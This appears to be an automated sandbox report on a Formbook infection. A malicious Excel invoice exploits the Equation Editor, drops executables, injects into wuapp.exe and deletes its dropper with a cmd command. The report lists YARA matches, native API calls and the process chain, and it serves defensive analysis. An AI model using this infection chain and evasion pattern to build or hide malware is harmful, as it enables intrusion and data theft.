Source: 00000007.00000000.1024425011.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.1032081329.00000000000C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.1032081329.00000000000C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.981158681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.981158681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Contains functionality to shutdown / reboot the system

Source: C:\Users\Public\vbc.exe

4_2_00403646

Detected potential crypto function

Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 5_2_013B1890	5_2_013B1890
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 5_2_013BC3BD	5_2_013BC3BD
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 5_2_013BA184	5_2_013BA184
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 5_2_013BB3F1	5_2_013BB3F1
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 5_2_013B9C12	5_2_013B9C12
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 5_2_013B96A0	5_2_013B96A0
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 5_2_013B7E88	5_2_013B7E88
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 5_2_00110A41	5_2_00110A41
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_00401030	6_2_00401030
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0041E1F5	6_2_0041E1F5
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0041E9FF	6_2_0041E9FF
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_00409220	6_2_00409220
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0040DBC0	6_2_0040DBC0
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0041DBBD	6_2_0041DBBD
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_00402D89	6_2_00402D89
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_00402D90	6_2_00402D90
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0041EF50	6_2_0041EF50
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0041DF0D	6_2_0041DF0D
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0041E79A	6_2_0041E79A
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_00402FB0	6_2_00402FB0
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_013BA184	6_2_013BA184
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_013B1890	6_2_013B1890
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_013BC3BD	6_2_013BC3BD
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_013BB3F1	6_2_013BB3F1
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_013B9C12	6_2_013B9C12
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_013B96A0	6_2_013B96A0
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_013B7E88	6_2_013B7E88
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0086E0C6	6_2_0086E0C6
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0089D005	6_2_0089D005
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_00873040	6_2_00873040
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0088905A	6_2_0088905A
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0086E2E9	6_2_0086E2E9
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_00911238	6_2_00911238
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_009163BF	6_2_009163BF
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0086F3CF	6_2_0086F3CF
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_008963DB	6_2_008963DB
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_00872305	6_2_00872305
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_00877353	6_2_00877353
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_008BA37B	6_2_008BA37B
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_00881489	6_2_00881489
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_008A5485	6_2_008A5485
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_008F443E	6_2_008F443E
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_008AD47D	6_2_008AD47D
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0088C5F0	6_2_0088C5F0
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0087351F	6_2_0087351F
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_008B6540	6_2_008B6540
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_00874680	6_2_00874680
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0087E6C1	6_2_0087E6C1
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_00912622	6_2_00912622
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_008BA634	6_2_008BA634
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_008F579A	6_2_008F579A
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0087C7BC	6_2_0087C7BC
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_008A57C3	6_2_008A57C3
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01EAE0C6	8_2_01EAE0C6
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F2D06D	8_2_01F2D06D
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01EB3040	8_2_01EB3040
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01EC905A	8_2_01EC905A
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01EDD005	8_2_01EDD005
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01EAF3CF	8_2_01EAF3CF
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01ED63DB	8_2_01ED63DB
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F563BF	8_2_01F563BF
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01EFA37B	8_2_01EFA37B
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01EB7353	8_2_01EB7353
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01EB2305	8_2_01EB2305
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01EAE2E9	8_2_01EAE2E9
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F51238	8_2_01F51238
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F305E3	8_2_01F305E3
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01ECC5F0	8_2_01ECC5F0
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01EF6540	8_2_01EF6540
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01EB351F	8_2_01EB351F
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01EC1489	8_2_01EC1489
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01EE5485	8_2_01EE5485
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01EED47D	8_2_01EED47D
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F3443E	8_2_01F3443E
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01EE57C3	8_2_01EE57C3
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01EBC7BC	8_2_01EBC7BC
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F3579A	8_2_01F3579A
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01EBE6C1	8_2_01EBE6C1
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01EB4680	8_2_01EB4680
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F52622	8_2_01F52622
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01EFA634	8_2_01EFA634
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01EC69FE	8_2_01EC69FE
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01EB29B2	8_2_01EB29B2
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F5098E	8_2_01F5098E
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F35955	8_2_01F35955
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F3394B	8_2_01F3394B
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F4F8EE	8_2_01F4F8EE
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F2F8C4	8_2_01F2F8C4
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01ED286D	8_2_01ED286D
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01EBC85C	8_2_01EBC85C
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F3DBDA	8_2_01F3DBDA
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F5CBA4	8_2_01F5CBA4
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01ED7B00	8_2_01ED7B00
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F63A83	8_2_01F63A83
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F4FDDD	8_2_01F4FDDD
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01EBCD5B	8_2_01EBCD5B
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01EE0D3B	8_2_01EE0D3B
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F22FDC	8_2_01F22FDC
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F4CFB1	8_2_01F4CFB1
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01EDDF7C	8_2_01EDDF7C
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01EC0F3F	8_2_01EC0F3F
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01ECEE4C	8_2_01ECEE4C
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01EE2E2F	8_2_01EE2E2F
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_0012E1BE	8_2_0012E1BE
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_0012E1EB	8_2_0012E1EB
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_00119220	8_2_00119220
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_0012E79A	8_2_0012E79A
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_0012E9FF	8_2_0012E9FF
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_0011DBC0	8_2_0011DBC0
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_00112D90	8_2_00112D90
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_00112D89	8_2_00112D89
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_0012DEF7	8_2_0012DEF7
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_00112FB0	8_2_00112FB0

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: String function: 008DF970 appears 41 times
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: String function: 008B373B appears 112 times
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: String function: 008B3F92 appears 59 times
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: String function: 013B4599 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: String function: 0086DF5C appears 59 times
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: String function: 013B2400 appears 54 times
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: String function: 01EADF5C appears 121 times
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: String function: 01F1F970 appears 84 times
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: String function: 01EF373B appears 245 times
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: String function: 01EF3F92 appears 132 times
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: String function: 01EAE2A8 appears 38 times

Contains functionality to call native functions

Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0041A2D0 NtCreateFile,	6_2_0041A2D0
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0041A380 NtReadFile,	6_2_0041A380
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0041A400 NtClose,	6_2_0041A400
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0041A4B0 NtAllocateVirtualMemory,	6_2_0041A4B0
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0041A2CA NtCreateFile,	6_2_0041A2CA
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0041A28A NtCreateFile,	6_2_0041A28A
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0041A4AA NtAllocateVirtualMemory,	6_2_0041A4AA
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_008600C4 NtCreateFile,LdrInitializeThunk,	6_2_008600C4
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_00860048 NtProtectVirtualMemory,LdrInitializeThunk,	6_2_00860048
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_00860078 NtResumeThread,LdrInitializeThunk,	6_2_00860078
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_008607AC NtCreateMutant,LdrInitializeThunk,	6_2_008607AC
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0085F9F0 NtClose,LdrInitializeThunk,	6_2_0085F9F0
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0085F900 NtReadFile,LdrInitializeThunk,	6_2_0085F900
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0085FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,	6_2_0085FAD0
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0085FAE8 NtQueryInformationProcess,LdrInitializeThunk,	6_2_0085FAE8
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0085FBB8 NtQueryInformationToken,LdrInitializeThunk,	6_2_0085FBB8
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0085FB68 NtFreeVirtualMemory,LdrInitializeThunk,	6_2_0085FB68
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0085FC90 NtUnmapViewOfSection,LdrInitializeThunk,	6_2_0085FC90
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0085FC60 NtMapViewOfSection,LdrInitializeThunk,	6_2_0085FC60
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0085FD8C NtDelayExecution,LdrInitializeThunk,	6_2_0085FD8C
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0085FDC0 NtQuerySystemInformation,LdrInitializeThunk,	6_2_0085FDC0
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0085FEA0 NtReadVirtualMemory,LdrInitializeThunk,	6_2_0085FEA0
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0085FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,	6_2_0085FED0
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0085FFB4 NtCreateSection,LdrInitializeThunk,	6_2_0085FFB4
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_008610D0 NtOpenProcessToken,	6_2_008610D0
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_00860060 NtQuerySection,	6_2_00860060
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_008601D4 NtSetValueKey,	6_2_008601D4
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0086010C NtOpenDirectoryObject,	6_2_0086010C
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_00861148 NtOpenThread,	6_2_00861148
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01EA00C4 NtCreateFile,LdrInitializeThunk,	8_2_01EA00C4
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01EA07AC NtCreateMutant,LdrInitializeThunk,	8_2_01EA07AC
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01E9F9F0 NtClose,LdrInitializeThunk,	8_2_01E9F9F0
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01E9F900 NtReadFile,LdrInitializeThunk,	8_2_01E9F900
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01E9FBB8 NtQueryInformationToken,LdrInitializeThunk,	8_2_01E9FBB8
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01E9FB68 NtFreeVirtualMemory,LdrInitializeThunk,	8_2_01E9FB68
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01E9FB50 NtCreateKey,LdrInitializeThunk,	8_2_01E9FB50
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01E9FAE8 NtQueryInformationProcess,LdrInitializeThunk,	8_2_01E9FAE8
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01E9FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,	8_2_01E9FAD0
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01E9FAB8 NtQueryValueKey,LdrInitializeThunk,	8_2_01E9FAB8
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01E9FDC0 NtQuerySystemInformation,LdrInitializeThunk,	8_2_01E9FDC0
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01E9FD8C NtDelayExecution,LdrInitializeThunk,	8_2_01E9FD8C
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01E9FC60 NtMapViewOfSection,LdrInitializeThunk,	8_2_01E9FC60
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01E9FFB4 NtCreateSection,LdrInitializeThunk,	8_2_01E9FFB4
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01E9FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,	8_2_01E9FED0
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01EA01D4 NtSetValueKey,	8_2_01EA01D4
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01EA1148 NtOpenThread,	8_2_01EA1148
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01EA010C NtOpenDirectoryObject,	8_2_01EA010C
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01EA10D0 NtOpenProcessToken,	8_2_01EA10D0
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01EA0060 NtQuerySection,	8_2_01EA0060
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01EA0078 NtResumeThread,	8_2_01EA0078
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01EA0048 NtProtectVirtualMemory,	8_2_01EA0048
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01E9F938 NtWriteFile,	8_2_01E9F938
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01EA1930 NtSetContextThread,	8_2_01EA1930
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01E9F8CC NtWaitForSingleObject,	8_2_01E9F8CC
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01E9FBE8 NtQueryVirtualMemory,	8_2_01E9FBE8
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01E9FA50 NtEnumerateValueKey,	8_2_01E9FA50
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01E9FA20 NtQueryInformationFile,	8_2_01E9FA20
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01EA1D80 NtSuspendThread,	8_2_01EA1D80
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01E9FD5C NtEnumerateKey,	8_2_01E9FD5C
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01E9FC90 NtUnmapViewOfSection,	8_2_01E9FC90
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01E9FC48 NtSetInformationFile,	8_2_01E9FC48
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01EA0C40 NtGetContextThread,	8_2_01EA0C40
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01E9FC30 NtOpenProcess,	8_2_01E9FC30
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01E9FFFC NtCreateProcessEx,	8_2_01E9FFFC
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01E9FF34 NtQueueApcThread,	8_2_01E9FF34
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01E9FEA0 NtReadVirtualMemory,	8_2_01E9FEA0
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01E9FE24 NtWriteVirtualMemory,	8_2_01E9FE24
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_0012A2D0 NtCreateFile,	8_2_0012A2D0
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_0012A380 NtReadFile,	8_2_0012A380
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_0012A400 NtClose,	8_2_0012A400
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_0012A4B0 NtAllocateVirtualMemory,	8_2_0012A4B0
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_0012A28A NtCreateFile,	8_2_0012A28A
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_0012A2CA NtCreateFile,	8_2_0012A2CA
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_0012A4AA NtAllocateVirtualMemory,	8_2_0012A4AA

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 77620000 page execute and read and write	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 77740000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 77620000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 77740000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Memory allocated: 77620000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Memory allocated: 77740000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Memory allocated: 77620000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Memory allocated: 77740000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\wuapp.exe	Memory allocated: 77620000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\wuapp.exe	Memory allocated: 77740000 page execute and read and write	Jump to behavior

Source: DL03327INV.xlsx	Virustotal: Detection: 38%
Source: DL03327INV.xlsx	ReversingLabs: Detection: 26%

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\boswagvgna
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Process created: C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\boswagvgna
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\wuapp.exe C:\Windows\SysWOW64\wuapp.exe
Source: C:\Windows\SysWOW64\wuapp.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\yldnat.exe"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\boswagvgna	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Process created: C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\boswagvgna	Jump to behavior
Source: C:\Windows\SysWOW64\wuapp.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\yldnat.exe"	Jump to behavior

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32

Jump to behavior

Source: C:\Users\Public\vbc.exe

4_2_00403646

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$DL03327INV.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR6B01.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@11/16@5/5

Source: C:\Users\Public\vbc.exe

Code function: 4_2_004021AA CoCreateInstance,

4_2_004021AA

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00404ABB GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

4_2_00404ABB

Source: explorer.exe, 00000007.00000000.993545742.0000000003B10000.00000002.00000001.00040000.00000000.sdmp

Binary or memory string: .VBPud<_

